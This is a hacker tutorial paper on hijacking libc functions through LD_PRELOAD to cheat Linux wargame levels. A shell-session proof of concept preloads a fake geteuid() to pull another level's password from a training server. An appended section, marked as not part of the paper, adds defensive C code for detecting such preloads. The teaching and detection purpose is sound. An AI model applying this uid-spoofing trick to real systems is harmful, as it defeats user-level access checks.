----------------------------------------------------------------------------
Title   : Shared Library Hijacking For Playing Wargames
Author  : x90c < geinblues@gmail.com >
Website : http://www.chollian.net/~jyj9782/

Best Regards Hax0r hkpco < hkpco@korea.com >
----------------------------------------------------------------------------


Shared Library on Linux
-----------------------

Shared libraries are libraries that are loaded by programs when they start.
When a shared library is installed properly, all programs that start
afterwards automatically use the new shared library. It's actually much more
flexible and sophisticated than this, because the approach used by Linux
permits you to:

  >> update libraries and still support programs that want to use older,
     non-backward-compatible versions of those libraries;
  >> override specific libraries or even specific functions in a library
     when executing a particular program;
  >> do all this while programs are running using existing libraries.

                                                   - "Program Library HOWTO"


Shared Library Hijacking
------------------------

This paper explains what shared library hijacking is and how to test it. It
is nothing new next to the most popular 0dayz, but when I started writing
this paper I couldn't find any article about this technique (which doesn't
mean there is none), so I decided to write it up for hax0rs around the world.

-- Behind story --

hkpco : "I'm taking the way to get any level password of wargames using an
         sled now"
x90c  : "(hmm) what about to turn it into paper for ppls ?"
hkpco : "wow that's good."
x90c  : (boom) (boom) (tatata) (boom).. .. To be continued ..

------ eof -------

As you may know, Linux's shared library feature allows us to wrap any C
function of libc (the C library, which is itself a shared library). If you
already know this trick you can skip this paper.

Step by step, how to hijack get????() and set????():

  First>  Make your own shared library containing wrapper functions such as
          geteuid(), getuid() and setuid() ..
  Second> Compile the above source code into a shared object with gcc.
  Third>  Copy the compiled shared object from the current directory into
          /tmp.
  Fourth> Set the LD_PRELOAD environment variable to the shared object's path
          under '/tmp/'.

Good.. To test it, run executables such as '/bin/id' or 'whoami', which will
now use your hijacked function.

If you make geteuid() always return zero (0), then user-level executables
that call geteuid() believe your faked information (that you are root), so
you can bypass any user-level uid check. But that doesn't mean you are really
root .. the kernel still knows you are not. So you can't read the records of
/etc/shadow.

Note that the LD_PRELOAD environment variable only affects your current shell
and the programs started from it.


POC ( ftz.hackerschool.org:23 )
-------------------------------

Tested on:
  - RedHat 9 (Shrike)
  - Linux Kernel 2.4.32
  - gcc 3.2.2

[level1@ftz level1]$ id
uid=3001(level1) gid=3001(level1) groups=3001(level1)
[level1@ftz level1]$ /bin/my-pass
Level1 Password is "level1".
[level1@ftz tmp]$ cat /etc/passwd|grep "level20"
level20:x:3100:3100::/home/level20:/bin/bash
[level1@ftz tmp]$ cat geteuid.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Wrapper that shadows libc's geteuid() when preloaded: every caller in the
 * process is told the effective uid is 3100 (level20's uid from /etc/passwd). */
uid_t geteuid( void )
{
    return 3100;
}
[level1@ftz tmp]$ gcc geteuid.c -fPIC -shared -o geteuid.so
[level1@ftz tmp]$ export LD_PRELOAD="/tmp/geteuid.so"
[level1@ftz tmp]$ /bin/my-pass
Level20 Password is "we are just regular guys".


Reference
---------

http://www.linux.org/docs/ldp/howto/Program-Library-HOWTO/shared-libraries.html
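The hijacked geteuid() in the POC only fools callers that go through libc. As an added example that is not part of the paper, the C program below (assumed names kernel_euid, euid_wrapper_consistent and count_untrusted_mappings, plus a constructed SAMPLE_MAPS listing) shows two checks a defender can run: asking the kernel for the euid through the raw syscall, which a preloaded wrapper cannot intercept, and scanning a /proc/<pid>/maps listing for shared objects mapped from outside the standard library directories.

```c
/* Added example (not from the paper): two checks for spotting a preloaded
 * wrapper like geteuid.so. Assumes Linux/glibc; SYS_geteuid is the raw syscall. */
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/syscall.h>

/* Ask the kernel directly; a preloaded geteuid() cannot intercept this. */
long kernel_euid(void) { return syscall(SYS_geteuid); }
/* 1 when libc's geteuid() agrees with the kernel, 0 when a wrapper (for
 * example one loaded through LD_PRELOAD) is feeding the process a fake euid. */
int euid_wrapper_consistent(void) { return (long)geteuid() == kernel_euid(); }
/* Count shared objects mapped from outside the standard library directories
 * in a /proc/<pid>/maps listing passed as one string (pathname is last). */
int count_untrusted_mappings(const char *maps)
{
    static const char *trusted[] = { "/lib/", "/lib64/", "/usr/lib/", "/usr/lib64/" };
    int n = 0;
    for (const char *p = maps; *p; ) {
        char line[256];
        const char *end = strchr(p, '\n');
        const char *next = end ? end + 1 : p + strlen(p);
        size_t len = (size_t)((end ? end : next) - p);
        if (len >= sizeof line) len = sizeof line - 1;
        memcpy(line, p, len); line[len] = '\0';
        const char *path = strchr(line, '/');            /* pathname column */
        if (path && strstr(path, ".so")) {
            int ok = 0;
            for (size_t i = 0; i < sizeof trusted / sizeof *trusted; i++)
                if (strncmp(path, trusted[i], strlen(trusted[i])) == 0) ok = 1;
            if (!ok) n++;
        }
        p = next;
    }
    return n;
}
/* Constructed sample maps listing for a process run with the POC's LD_PRELOAD;
 * only the /tmp entry should be flagged. */
const char SAMPLE_MAPS[] =
    "00400000-00401000 r-xp 00000000 08:01 1234 /bin/id\n"
    "7f0000000000-7f0000001000 r-xp 00000000 08:01 5678 /tmp/geteuid.so\n"
    "7f0000100000-7f0000200000 r-xp 00000000 08:01 9999 /lib/libc.so.6\n"
    "7ffd00000000-7ffd00021000 rw-p 00000000 00:00 0 [stack]\n";
int main(void)
{
    printf("geteuid() agrees with kernel: %d\n", euid_wrapper_consistent());
    printf("untrusted .so mappings in sample: %d\n", count_untrusted_mappings(SAMPLE_MAPS));
    return 0;
}
```

Run the same binary with the POC's LD_PRELOAD exported and the first check reports a mismatch between libc and the kernel. Note that for set-user-ID and set-group-ID executables ld.so runs in secure-execution mode and ignores LD_PRELOAD entries that contain a slash, so this trick only reaches ordinary user-level programs.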